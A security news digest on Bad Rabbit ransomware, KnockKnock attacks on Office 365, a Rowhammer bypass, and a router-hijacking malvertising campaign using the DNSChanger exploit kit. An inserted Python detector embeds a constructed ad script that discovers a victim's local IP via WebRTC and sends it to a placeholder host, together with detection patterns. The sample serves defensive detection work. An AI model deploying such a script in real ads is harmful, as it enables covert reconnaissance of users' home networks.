Bad Rabbit – new ransomware spreads via network

The ransomware encrypts files on the system and displays a ransom note demanding 0.05 bitcoin (~$285) from victims to unlock their systems.

According to Trend Micro research, Bad Rabbit spreads via a fake Flash installer, “install_flash_player.exe”, served from compromised sites. At present, the link for downloading the fake installer is inaccessible.

New attack scheme on Office 365 corporate users

KnockKnock was discovered by Skyhigh Networks experts, who noted that the key distinction of this new attack is the nature of the accounts being targeted. The attack targets system accounts that are not assigned to any individual user. System accounts have more privileges and, in addition, a more lenient password policy. With access to such an account, it is easier for hackers to continue attacking the corporate network.

Researchers found a new method to bypass protection against Rowhammer attacks

A group of scientists from Adelaide, Pennsylvania, Maryland and Graz University of Technology published a study that describes a new way to bypass the defense against Rowhammer attacks.

To launch the attack, the attacker needs to narrow the Rowhammer data bombardment down to one single row of memory cells instead of multiple locations. According to the test results, the revised Rowhammer attack may take between 44 and 138 hours, but this shouldn’t be a problem if an attacker targets online servers and cloud providers.

Home Routers Under Attack via Malvertising on Windows, Android Devices

Nowadays it is difficult to surprise anyone with malicious advertising campaigns, but Proofpoint experts have discovered a new trend in this area. Attackers are now targeting not the users’ browsers but their routers. The attacker’s final goal is to inject ads into every page visited by the infected victim. Interestingly, the campaign focused not on IE users, as is often the case, but on Chrome users (both desktop and mobile versions).


Attack scheme

The attackers proceed as follows: they buy advertising space on legitimate sites. For this they use the AdSupply, OutBrain, Popcash, Propellerads and Taboola ad networks. The ad embeds malicious JavaScript code that issues a WebRTC request to Mozilla’s STUN server to discover the victim’s local IP address. Based on this information, the malware determines whether the user is on a local network behind a home router. If the answer is positive, the attack continues. If not, the user is shown an ordinary, harmless advertisement and avoids trouble.
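A defender-side check for the first stage of this scheme, added here as an example and not part of the original article or Proofpoint’s research: a small static scanner that flags ad creatives whose JavaScript combines RTCPeerConnection, a STUN server and a private-address test, which is the signature of the WebRTC local-IP discovery described above. The two ad scripts below are constructed, and the STUN hostname in the first one is assumed.

```python
import re

# Constructed ad creatives (not samples from the campaign): creative_a performs
# WebRTC/STUN local-IP discovery, creative_b is an ordinary banner script.
SAMPLE_ADS = {
    "creative_a.js": r"""
        var pc = new (window.RTCPeerConnection || window.webkitRTCPeerConnection)(
            {iceServers: [{urls: "stun:stun.services.mozilla.com"}]});  // assumed host
        pc.createDataChannel("");
        pc.createOffer().then(function (o) { pc.setLocalDescription(o); });
        pc.onicecandidate = function (e) {
            if (!e.candidate) return;
            var m = /(\d+\.\d+\.\d+\.\d+)/.exec(e.candidate.candidate);
            if (m && /^(192\.168|10\.|172\.(1[6-9]|2[0-9]|3[01]))/.test(m[1])) {
                location.href = "http://REDIRECT-PLACEHOLDER.example/?ip=" + m[1];
            }
        };
    """,
    "creative_b.js": r"""
        var img = document.createElement("img");
        img.src = "https://cdn.example/banner.png";
        document.getElementById("ad-slot").appendChild(img);
    """,
}

# Each indicator on its own is legitimate (WebRTC is used by real video ads);
# the combination is what marks local-network reconnaissance.
INDICATORS = {
    "peerconnection": re.compile(r"\b(?:webkit|moz)?RTCPeerConnection\b"),
    "stun_server": re.compile(r"stun:[\w.\-]+"),
    "ice_candidate": re.compile(r"onicecandidate|icecandidate"),
    # RFC 1918 prefixes, written either as plain text or inside a JS regex
    # (where the dot is escaped as "\.").
    "private_range": re.compile(r"192\\?\.168|\b10\\?\.|172\\?\."),
}


def scan_ad_script(src: str) -> set:
    """Return the names of all indicators present in an ad's JavaScript."""
    return {name for name, rx in INDICATORS.items() if rx.search(src)}


def stun_hosts(src: str) -> list:
    """List STUN servers the script contacts; useful for monitoring or blocking."""
    return re.findall(r"stun:([\w.\-]+)", src)


def is_webrtc_recon(src: str) -> bool:
    """Flag scripts that set up a peer connection and test for private addresses."""
    hits = scan_ad_script(src)
    return ("peerconnection" in hits and "private_range" in hits
            and ("stun_server" in hits or "ice_candidate" in hits))
```

Run it over each creative delivered by an ad network and quarantine any for which is_webrtc_recon() is true before it reaches the page.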

Router owners are not shown the harmless ad. Instead, the advertisement takes them straight to the DNSChanger exploit kit, which continues the attack. Using steganography, the attacker sends the victim an image that contains an AES key. The malicious advertisement uses this key to decrypt the further traffic it receives from DNSChanger. In this way the attackers hide their operations from the attention of IS professionals.

After receiving the AES key, DNSChanger sends the victim a list of distinguishing features for 166 routers (including various models of Linksys, Netgear, D-Link, Comtrend, Zyxel and Pirelli), which is used to identify the router model; the result is then transmitted to the attackers’ control server. The server holds a list of vulnerabilities and hard-coded credentials for different devices, which are used to take control of the victim’s router. Proofpoint experts noted that in some cases (if the model allows) the attackers also try to open an external connection to an administrative port on the router and take control directly.